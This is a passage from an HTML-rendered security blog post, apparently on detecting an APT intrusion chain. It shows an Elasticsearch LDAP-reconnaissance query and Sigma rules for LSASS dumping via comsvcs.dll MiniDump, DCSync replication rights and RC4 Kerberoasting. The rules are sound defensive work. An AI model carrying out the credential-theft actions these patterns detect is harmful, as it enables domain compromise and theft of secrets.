class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"@timestamp\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"gte\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"now-5m\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"should\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"wildcard\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span 
class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"winlog.event_data.Filter\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"*objectClass=computer*\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"wildcard\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"winlog.event_data.Filter\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"*nTSecurityDescriptor*\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"wildcard\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"winlog.event_data.Filter\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"*servicePrincipalName*\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"minimum_should_match\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">2</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 
16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"checkpoint-3-credential-dumping-detection\">Checkpoint 3: Credential Dumping Detection<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#checkpoint-3-credential-dumping-detection\" class=\"hash-link\" aria-label=\"Direct link to Checkpoint 3: Credential Dumping Detection\" title=\"Direct link to Checkpoint 3: Credential Dumping Detection\" translate=\"no\">​</a></h3>\n<p><strong>comsvcs.dll MiniDump Sigma rule:</strong></p>\n<div class=\"language-yaml codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-yaml codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">title</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> LSASS Dump via comsvcs.dll MiniDump</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">status</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> stable</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">description</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> Detects LSASS memory dump using the built</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\">in comsvcs.dll MiniDump export</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">logsource</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">product</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> windows</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">service</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">detection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">selection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">EventID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">4688</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">NewProcessName|endswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'\\rundll32.exe'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">CommandLine|contains|all</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'comsvcs'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'MiniDump'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356,
75%, 47%)\">condition</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> selection</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">falsepositives</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> None known</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">level</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> critical</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">tags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> attack.credential_access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> attack.t1003.001</span><br></span></code></pre></div></div>\n<p><strong>DCSync Sigma rule:</strong></p>\n<div class=\"language-yaml codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 
16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-yaml codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">title</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> DCSync Attack </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> Replication Rights Abuse</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">status</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> production</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">description</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token scalar string\" style=\"color:hsl(139, 66%, 32%)\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token scalar string\" style=\"color:hsl(139, 66%, 32%)\">  Detects DCSync by identifying replication rights exercised</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token scalar string\" style=\"color:hsl(139, 66%, 32%)\">  by a non-computer, non-DC account</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">logsource</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">product</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> windows</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">service</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">detection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">selection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">EventID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">4662</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key 
atrule\" style=\"color:hsl(356, 75%, 47%)\">Properties|contains</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'</span><span class=\"token plain\">   </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># DS-Replication-Get-Changes</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'</span><span class=\"token plain\">   </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># DS-Replication-Get-Changes-All</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">filter_computer_accounts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">SubjectUserName|endswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'$'</span><span class=\"token 
plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">filter_known_dc_sync</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">SubjectUserName|startswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'MSOL_'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'AADConnect'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">condition</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> selection and not filter_computer_accounts and not filter_known_dc_sync</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">falsepositives</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span 
class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> Azure AD Connect sync accounts (add to filter)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">level</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> critical</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">tags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> attack.credential_access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> attack.t1003.006</span><br></span></code></pre></div></div>\n<p><strong>Kerberoasting RC4 Sigma rule:</strong></p>\n<div class=\"language-yaml codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-yaml codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 
47%)\">title</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> Kerberoasting </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> RC4 TGS Request for AES</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\">Capable Account</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">status</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> production</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">description</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token scalar string\" style=\"color:hsl(139, 66%, 32%)\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token scalar string\" style=\"color:hsl(139, 66%, 32%)\">  Detects Kerberos TGS requests using RC4 encryption for accounts</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token scalar string\" style=\"color:hsl(139, 66%, 32%)\">  that should be requesting AES. 
Indicates potential Kerberoasting.</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">logsource</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">product</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> windows</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">service</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">detection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">selection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">EventID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 
35%)\">4769</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">TicketEncryptionType</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'0x17'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">TicketOptions</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'0x40810000'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">filter_legit</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">ServiceName</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'krbtgt'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">condition</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> selection and not 
filter_legit</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">falsepositives</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> Legacy systems without AES support (document and exclude)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">level</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> high</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">tags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> attack.credential_access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> attack.t1558.003</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-5--building-a-breakout-timer-metric-for-your-soc\">Section 5: Building a Breakout Timer Metric for Your SOC<a 
